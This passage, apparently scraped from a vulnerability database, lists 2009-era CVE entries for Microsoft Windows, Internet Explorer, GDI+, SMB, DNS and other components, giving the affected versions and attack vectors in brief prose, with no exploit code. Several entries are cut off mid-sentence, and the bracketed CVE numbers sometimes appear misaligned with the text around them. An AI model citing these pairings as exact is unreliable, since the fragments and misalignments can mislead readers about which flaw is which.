Explorer 7 on Vista, allows remote attackers to cause a denial of service (application crash) via JavaScript code that calls createElement to create an instance of the LI element, and then calls setAttribute to set the value attribute. [CVE-2009-2764] Microsoft Internet Explorer 8.0.7100.0 on Windows 7 RC on the x64 platform allows remote attackers to cause a denial of service (application crash) via a certain DIV element in conjunction with SCRIPT elements that have empty contents and no reference to a valid external script location. [CVE-2009-2655] mshtml.dll in Microsoft Internet Explorer 7 and 8 on Windows XP SP3 allows remote attackers to cause a denial of service (application crash) by calling the JavaScript findText method with a crafted Unicode string in the first argument, and only one additional argument, as demonstrated by a second argument of -1. [CVE-2009-2653] DISPUTED The NtUserConsoleControl function in win32k.sys in Microsoft Windows XP SP2 and SP3, and Server 2003 before SP1, allows local administrators to bypass unspecified "security software" and gain privileges via a crafted call that triggers an overwrite of an arbitrary memory location. NOTE: the vendor disputes the significance of this report, stating that 'the Administrator to SYSTEM "escalation" is not a security boundary we defend.' [CVE-2009-2544] Directory traversal vulnerability in the Marcelo Costa FileServer component 1.0 for Microsoft Windows Live Messenger and Messenger Plus! Live (MPL) allows remote authenticated users to list arbitrary directories and read arbitrary files via a .. (dot dot) in a pathname. [CVE-2009-2532] Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC do not properly process the command value in an SMB Multi-Protocol Negotiate Request packet, which allows remote attackers to execute arbitrary code via a crafted SMBv2 packet to the Server service, aka "SMBv2 Command Value Vulnerability." [CVE-2009-2527] Heap-based buffer overflow in Microsoft Windows Media Player 6.4 allows remote attackers to execute arbitrary code via (1) a crafted ASF file or (2) crafted streaming content, aka "WMP Heap Overflow Vulnerability." [CVE-2009-2526] Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 do not properly validate fields in SMBv2 packets, which allows remote attackers to cause a denial of service (infinite loop and system hang) via a crafted packet to the Server service, aka "SMBv2 Infinite Loop Vulnerability." [CVE-2009-2525] Microsoft Windows Media Runtime, as used in DirectShow WMA Voice Codec, Windows Media Audio Voice Decoder, and Audio Compression Manager (ACM), does not properly initialize unspecified functions within compressed audio files, which allows remote attackers to execute arbitrary code via (1) a crafted media file or (2) crafted streaming content, aka "Windows Media Runtime Heap Corruption Vulnerability." [CVE-2009-2524] Integer underflow in the NTLM authentication feature in the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to cause a denial of service (reboot) via a malformed packet, aka "Local Security Authority Subsystem Service Integer Overflow Vulnerability." [CVE-2009-2523] The License Logging Server (llssrv.exe) in Microsoft Windows 2000 SP4 allows remote attackers to execute arbitrary code via an RPC message containing a string without a null terminator, which triggers a heap-based buffer overflow in the LlsrLicenseRequestW method, aka "License Logging Server Heap Overflow Vulnerability." [CVE-2009-2519] The DHTML Editing Component ActiveX control in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly format HTML markup, which allows remote attackers to execute arbitrary code via a crafted web site that triggers "system state" corruption, aka "DHTML Editing Component ActiveX Control Vulnerability." [CVE-2009-2517] The kernel in Microsoft Windows Server 2003 SP2 does not properly handle unspecified exceptions when an error condition occurs, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2009-2516] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold and SP1, and Server 2008 Gold does not properly validate data sent from user mode, which allows local users to gain privileges via a crafted PE .exe file that triggers a NULL pointer dereference during chain traversal, aka "Windows Kernel NULL Pointer Dereference Vulnerability." [CVE-2009-2515] Integer underflow in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows local users to gain privileges via a crafted application that triggers an incorrect truncation of a 64-bit integer to a 32-bit integer, aka "Windows Kernel Integer Underflow Vulnerability." [CVE-2009-2514] win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not correctly parse font code during construction of a directory-entry table, which allows remote attackers to execute arbitrary code via a crafted Embedded OpenType (EOT) font, aka "Win32k EOT Parsing Vulnerability." [CVE-2009-2513] The Graphics Device Interface (GDI) in win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Insufficient Data Validation Vulnerability." [CVE-2009-2511] Integer overflow in the CryptoAPI component in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows man-in-the-middle attackers to spoof arbitrary SSL servers and other entities via an X.509 certificate that has a malformed ASN.1 Object Identifier (OID) and was issued by a legitimate Certification Authority, aka "Integer Overflow in X.509 Object Identifiers Vulnerability." [CVE-2009-2510] The CryptoAPI component in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, as used by Internet Explorer and other applications, does not properly handle a '\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, aka "Null Truncation in X.509 Common Name Vulnerability," a related issue to CVE-2009-2408. [CVE-2009-2509] Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly validate headers in HTTP requests, which allows remote authenticated users to execute arbitrary code via a crafted request to an IIS web server, aka "Remote Code Execution in ADFS Vulnerability." [CVE-2009-2508] The single sign-on implementation in Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly remove credentials at the end of a network session, which allows physically proximate attackers to obtain the credentials of a previous user of the same web browser by using data from the browser's cache, aka "Single Sign On Spoofing in ADFS Vulnerability." [CVE-2009-2507] A certain ActiveX control in the Indexing Service in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly process URLs, which allows remote attackers to execute arbitrary programs via unspecified vectors that cause a "vulnerable binary" to load and run, aka "Memory Corruption in Indexing Service Vulnerability." [CVE-2009-2505] The Internet Authentication Service (IAS) in Microsoft Windows Vista SP2 and Server 2008 SP2 does not properly validate MS-CHAP v2 Protected Extensible Authentication Protocol (PEAP) authentication requests, which allows remote attackers to execute arbitrary code via crafted structures in a malformed request, aka "Internet Authentication Service Memory Corruption Vulnerability." [CVE-2009-2504] Multiple integer overflows in unspecified APIs in GDI+ in Microsoft .NET Framework 1.1 SP1, .NET Framework 2.0 SP1 and SP2, Windows XP SP2 and SP3, Windows Server 2003 SP2, Vista Gold and SP1, Server 2008 Gold, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allow remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "GDI+ .NET API Vulnerability." [CVE-2009-2503] GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Windows Server 2003 SP2, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 does not properly allocate an unspecified buffer, which allows remote attackers to execute arbitrary code via a crafted TIFF image file that triggers memory corruption, aka "GDI+ TIFF Memory Corruption Vulnerability." [CVE-2009-2502] Buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted TIFF image file, aka "GDI+ TIFF Buffer Overflow Vulnerability." [CVE-2009-2501] Heap-based buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Heap Overflow Vulnerability." [CVE-2009-2500] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted WMF image file, aka "GDI+ WMF Integer Overflow Vulnerability." [CVE-2009-2499] Microsoft Windows Media Format Runtime 9.0, 9.5, and 11 [CVE-2009-2498] Microsoft Windows Media Format Runtime 9.0, 9.5, and 11 and Windows Media Services 9.1 and 2008 do not properly parse malformed headers in Advanced Systems Format (ASF) files, which allows remote attackers to execute arbitrary code via a crafted (1) .asf, (2) .wmv, or (3) .wma file, aka "Windows Media Header Parsing Invalid Free Vulnerability." [CVE-2009-2494] The Active Template Library (ATL) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via vectors related to erroneous free operations after reading a variant from a stream and deleting this variant, aka "ATL Object Type Mismatch Vulnerability." [CVE-2009-2484] Stack-based buffer overflow in the Win32AddConnection function in modules/access/smb.c in VideoLAN VLC media player 0.9.9, when running on Microsoft Windows, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long smb URI in a playlist file. [CVE-2009-2357] The default configuration of TekRADIUS 3.0 uses the sa account to communicate with Microsoft SQL Server, which makes it easier for remote attackers to obtain privileged access to the database and the underlying Windows operating system. [CVE-2009-1930] The Telnet service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote Telnet servers to execute arbitrary code on a client machine by replaying the NTLM credentials of a client user, aka "Telnet Credential Reflection Vulnerability," a related issue to CVE-2000-0834. [CVE-2009-1929] Heap-based buffer overflow in the Microsoft Terminal Services Client ActiveX control running RDP 6.1 on Windows XP SP2, Vista SP1 or SP2, or Server 2008 Gold or SP2 [CVE-2009-1928] Stack consumption vulnerability in the LDAP service in Active Directory on Microsoft Windows 2000 SP4, Server 2003 SP2, and Server 2008 Gold and SP2 [CVE-2009-1926] Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to cause a denial of service (TCP outage) via a series of TCP sessions that have pending data and a (1) small or (2) zero receive window size, and remain in the FIN-WAIT-1 or FIN-WAIT-2 state indefinitely, aka "TCP/IP Orphaned Connections Vulnerability." [CVE-2009-1925] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 does not properly manage state information, which allows remote attackers to execute arbitrary code by sending packets to a listening service, and thereby triggering misinterpretation of an unspecified field as a function pointer, aka "TCP/IP Timestamps Code Execution Vulnerability." [CVE-2009-1924] Integer overflow in the Windows Internet Name Service (WINS) component for Microsoft Windows 2000 SP4 allows remote WINS replication partners to execute arbitrary code via crafted data structures in a packet, aka "WINS Integer Overflow Vulnerability." [CVE-2009-1923] Heap-based buffer overflow in the Windows Internet Name Service (WINS) component for Microsoft Windows 2000 SP4 and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted WINS replication packet that triggers an incorrect buffer-length calculation, aka "WINS Heap Overflow Vulnerability." [CVE-2009-1922] The Message Queuing (aka MSMQ) service for Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP2, and Vista Gold does not properly validate unspecified IOCTL request data from user mode before passing this data to kernel mode, which allows local users to gain privileges via a crafted request, aka "MSMQ Null Pointer Vulnerability." [CVE-2009-1920] The JScript scripting engine 5.1, 5.6, 5.7, and 5.8 in JScript.dll in Microsoft Windows, as used in Internet Explorer, does not properly load decoded scripts into memory before execution, which allows remote attackers to execute arbitrary code via a crafted web site that triggers memory corruption, aka "JScript Remote Code Execution Vulnerability." [CVE-2009-1808] Microsoft Windows XP SP3 allows local users to cause a denial of service (system crash) by making an SPI_SETDESKWALLPAPER SystemParametersInfo call with an improperly terminated pvParam argument, followed by an SPI_GETDESKWALLPAPER SystemParametersInfo call. [CVE-2009-1546] Integer overflow in Avifil32.dll in the Windows Media file handling functionality in Microsoft Windows allows remote attackers to execute arbitrary code on a Windows 2000 SP4 system via a crafted AVI file, or cause a denial of service on a Windows XP SP2 or SP3, Server 2003 SP2, Vista Gold, SP1, or SP2, or Server 2008 Gold or SP2 system via a crafted AVI file, aka "AVI Integer Overflow Vulnerability." [CVE-2009-1545] Unspecified vulnerability in Avifil32.dll in the Windows Media file handling functionality in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a malformed header in a crafted AVI file, aka "Malformed AVI Header Vulnerability." [CVE-2009-1544] Double free vulnerability in the Workstation service in Microsoft Windows allows remote authenticated users to gain privileges via a crafted RPC message to a Windows XP SP2 or SP3 or Server 2003 SP2 system, or cause a denial of service via a crafted RPC message to a Vista Gold, SP1, or SP2 or Server 2008 Gold or SP2 system, aka "Workstation Service Memory Corruption Vulnerability." [CVE-2009-1539] The QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 does not properly validate unspecified size fields in QuickTime media files, which allows remote attackers to execute arbitrary code via a crafted file, aka "DirectX Size Validation Vulnerability." [CVE-2009-1538] The QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 performs updates to pointers without properly validating unspecified data values, which allows remote attackers to execute arbitrary code via a crafted QuickTime media file, aka "DirectX Pointer Validation Vulnerability." [CVE-2009-1537] Unspecified vulnerability in the QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted QuickTime media file, as exploited in the wild in May 2009, aka "DirectX NULL Byte Overwrite Vulnerability." [CVE-2009-1533] Buffer overflow in the Works for Windows document converters in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, Office 2007 SP1, and Works 8.5 and 9 allows remote attackers to execute arbitrary code via a crafted Works .wps file that triggers memory corruption, aka "File Converter Buffer Overflow Vulnerability." [CVE-2009-1532] Microsoft Internet Explorer 8 for Windows XP SP2 and SP3 [CVE-2009-1531] Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 [CVE-2009-1530] Use-after-free vulnerability in Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 [CVE-2009-1529] Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 [CVE-2009-1528] Microsoft Internet Explorer 6 and 7 for Windows XP SP2 and SP3 [CVE-2009-1511] GDI+ in Microsoft Windows XP SP3 allows remote attackers to cause a denial of service (infinite loop) via a PNG file that contains a certain large btChunkLen value. [CVE-2009-1335] Microsoft Internet Explorer 7 and 8 on Windows XP and Vista allows remote attackers to cause a denial of service (application hang) via a large document composed of unprintable characters, aka MSRC 9011jr. [CVE-2009-1331] Integer overflow in Microsoft Windows Media Player (WMP) 11.0.5721.5260 allows remote attackers to cause a denial of service (application crash) via a crafted .mid file, as demonstrated by crash.mid. [CVE-2009-1217] Off-by-one error in the GpFont::SetData function in gdiplus.dll in Microsoft GDI+ on Windows XP allows remote attackers to cause a denial of service (stack corruption and application termination) via a crafted EMF file that triggers an integer overflow, as demonstrated by voltage-exploit.emf, aka the "Microsoft GdiPlus EMF GpFont.SetData integer overflow." [CVE-2009-1216] Multiple unspecified vulnerabilities in (1) unlzh.c and (2) unpack.c in the gzip libraries in Microsoft Windows Server 2008, Windows Services for UNIX 3.0 and 3.5, and the Subsystem for UNIX-based Applications (SUA) [CVE-2009-1141] Microsoft Internet Explorer 6 for Windows XP SP2 and SP3 and Server 2003 SP2 allows remote attackers to execute arbitrary code via unspecified DHTML function calls related to a tr element and the "insertion, deletion and attributes of a table cell," which trigger memory corruption when the window is destroyed, aka "DHTML Object Memory Corruption Vulnerability." [CVE-2009-1139] Memory leak in the LDAP service in Active Directory on Microsoft Windows 2000 SP4 and Server 2003 SP2, and Active Directory Application Mode (ADAM) on Windows XP SP2 and SP3 and Server 2003 SP2, allows remote attackers to cause a denial of service (memory consumption and service outage) via (1) LDAP or (2) LDAPS requests with unspecified OID filters, aka "Active Directory Memory Leak Vulnerability." [CVE-2009-1138] The LDAP service in Active Directory on Microsoft Windows 2000 SP4 does not properly free memory for LDAP and LDAPS requests, which allows remote attackers to execute arbitrary code via a request that uses hexadecimal encoding, whose associated memory is not released, related to a "DN AttributeValue," aka "Active Directory Invalid Free Vulnerability." NOTE: this issue is probably a memory leak. [CVE-2009-1133] Heap-based buffer overflow in Microsoft Remote Desktop Connection (formerly Terminal Services Client) running RDP 5.0 through 6.1 on Windows, and Remote Desktop Connection Client for Mac 2.0, allows remote attackers to execute arbitrary code via unspecified parameters, aka "Remote Desktop Connection Heap Overflow Vulnerability." [CVE-2009-1132] Heap-based buffer overflow in the Wireless LAN AutoConfig Service (aka Wlansvc) in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a malformed wireless frame, aka "Wireless Frame Parsing Remote Code Execution Vulnerability." [CVE-2009-1127] win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not correctly validate an argument to an unspecified system call, which allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, aka "Win32k NULL Pointer Dereferencing Vulnerability." [CVE-2009-1126] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly validate the user-mode input associated with the editing of an unspecified desktop parameter, which allows local users to gain privileges via a crafted application, aka "Windows Desktop Parameter Edit Vulnerability." [CVE-2009-1125] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate an argument to an unspecified system call, which allows local users to gain privileges via a crafted application, aka "Windows Driver Class Registration Vulnerability." [CVE-2009-1124] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate user-mode pointers in unspecified error conditions, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Pointer Validation Vulnerability." [CVE-2009-1123] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate changes to unspecified kernel objects, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Desktop Vulnerability." [CVE-2009-1122] The WebDAV extension in Microsoft Internet Information Services (IIS) 5.0 on Windows 2000 SP4 does not properly decode URLs, which allows remote attackers to bypass authentication, and possibly read or create files, via a crafted HTTP request, aka "IIS 5.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1535. [CVE-2009-1043] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors triggered by clicking on a link, as demonstrated by Nils during a PWN2OWN competition at CanSecWest 2009. [CVE-2009-0568] The RPC Marshalling Engine (aka NDR) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly maintain its internal state, which allows remote attackers to overwrite arbitrary memory locations via a crafted RPC message that triggers incorrect pointer reading, related to "IDL interfaces containing a non-conformant varying array" and FC_SMVARRAY, FC_LGVARRAY, FC_VARIABLE_REPEAT, and FC_VARIABLE_OFFSET, aka "RPC Marshalling Engine Vulnerability." [CVE-2009-0555] Microsoft Windows Media Runtime, as used in DirectShow WMA Voice Codec, Windows Media Audio Voice Decoder, and Audio Compression Manager (ACM), does not properly process Advanced Systems Format (ASF) files, which allows remote attackers to execute arbitrary code via a crafted audio file that uses the Windows Media Speech codec, aka "Windows Media Runtime Voice Sample Rate Vulnerability." [CVE-2009-0554] Microsoft Internet Explorer 5.01 SP4, 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0553] Microsoft Internet Explorer 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0552] Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4, 6 SP1, 6 on Windows XP SP2 and SP3, and 6 on Windows Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0551] Microsoft Internet Explorer 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 does not properly handle transition errors in a request for one HTTP document followed by a request for a second HTTP document, which allows remote attackers to execute arbitrary code via vectors involving (1) multiple crafted pages on a web site or (2) a web page with crafted inline content such as banner advertisements, aka "Page Transition Memory Corruption Vulnerability." [CVE-2009-0550] Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 [CVE-2009-0341] The shell32 module in Microsoft Internet Explorer 7.0 on Windows XP SP3 might allow remote attackers to execute arbitrary code via a long VALUE attribute in an INPUT element, possibly related to a stack consumption vulnerability. [CVE-2009-0320] Microsoft Windows XP, Server 2003 and 2008, and Vista exposes I/O activity measurements of all processes, which allows local users to obtain sensitive information, as demonstrated by reading the I/O Other Bytes column in Task Manager (aka taskmgr.exe) to estimate the number of characters that a different user entered at a runas.exe password prompt, related to a "benchmarking attack." [CVE-2009-0244] Directory traversal vulnerability in the OBEX FTP Service in the Microsoft Bluetooth stack in Windows Mobile 6 Professional, and probably Windows Mobile 5.0 for Pocket PC and 5.0 for Pocket PC Phone Edition, allows remote authenticated users to list arbitrary directories, and create or read arbitrary files, via a .. (dot dot) in a pathname. NOTE: this can be leveraged for code execution by writing to a Startup folder. [CVE-2009-0243] Microsoft Windows does not properly enforce the Autorun and NoDriveTypeAutoRun registry values, which allows physically proximate attackers to execute arbitrary code by (1) inserting CD-ROM media, (2) inserting DVD media, (3) connecting a USB device, and (4) connecting a Firewire device [CVE-2009-0239] Cross-site scripting (XSS) vulnerability in Windows Search 4.0 for Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows user-assisted remote attackers to inject arbitrary web script or HTML via a crafted file that appears in a preview in a search result, aka "Script Execution in Windows Search Vulnerability." [CVE-2009-0235] Stack-based buffer overflow in the Word 97 text converter in WordPad in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted Word 97 file that triggers memory corruption, related to use of inconsistent integer data sizes for an unspecified length field, aka "WordPad Word 97 Text Converter Stack Overflow Vulnerability." [CVE-2009-0234] The DNS Resolver Cache Service (aka DNSCache) in Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008 does not properly cache crafted DNS responses, which makes it easier for remote attackers to predict transaction IDs and poison caches by sending many crafted DNS queries that trigger "unnecessary lookups," aka "DNS Server Response Validation Vulnerability." [CVE-2009-0233] The DNS Resolver Cache Service (aka DNSCache) in Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008, when dynamic updates are enabled, does not reuse cached DNS responses in all applicable situations, which makes it easier for remote attackers to predict transaction IDs and poison caches by simultaneously sending crafted DNS queries and responses, aka "DNS Server Query Validation Vulnerability." [CVE-2009-0232] Integer overflow in the Embedded OpenType (EOT) Font Engine in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted name table, aka "Embedded OpenType Font Integer Overflow Vulnerability." [CVE-2009-0231] The Embedded OpenType (EOT) Font Engine (T2EMBED.DLL) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted name table in a data record that triggers an integer truncation and a heap-based buffer overflow, aka "Embedded OpenType Font Heap Overflow Vulnerability." [CVE-2009-0230] The Windows Print Spooler in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 allows remote authenticated users to gain privileges via a crafted RPC message that triggers loading of a DLL file from an arbitrary directory, aka "Print Spooler Load Library Vulnerability." [CVE-2009-0229] The Windows Printing Service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 allows local users to read arbitrary files via a crafted separator page, aka "Print Spooler Read File Vulnerability." [CVE-2009-0228] Stack-based buffer overflow in the EnumeratePrintShares function in Windows Print Spooler Service (win32spl.dll) in Microsoft Windows 2000 SP4 allows remote printer servers to execute arbitrary code via a a crafted ShareName in a response to an RPC request, related to "printing data structures," aka "Buffer Overflow in Print Spooler Vulnerability." [CVE-2009-0202] Array index error in FL21WIN.DLL in the PowerPoint Freelance Windows 2.1 Translator in Microsoft PowerPoint 2000 and 2002 allows remote attackers to execute arbitrary code via a Freelance file with unspecified "layout information" that triggers a heap-based buffer overflow. [CVE-2009-0119] Buffer overflow in Microsoft Windows XP SP3 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via a crafted .chm file. [CVE-2009-0094] The WINS server in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 does not restrict registration of the (1) "wpad" and (2) "isatap" NetBIOS names, which allows remote authenticated users to hijack the Web Proxy Auto-Discovery (WPAD) and Intra-Site Automatic Tunnel Addressing Protocol (ISATAP) features, and conduct man-in-the-middle attacks by spoofing a proxy server or ISATAP route, by registering one of these names in the WINS database, aka "WPAD WINS Server Registration Vulnerability," a related issue to CVE-2007-1692. [CVE-2009-0093] Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008, when dynamic updates are enabled, does not restrict registration of the "wpad" hostname, which allows remote authenticated users to hijack the Web Proxy Auto-Discovery (WPAD) feature, and conduct man-in-the-middle attacks by spoofing a proxy server, via a Dynamic Update request for this hostname, aka "DNS Server Vulnerability in WPAD 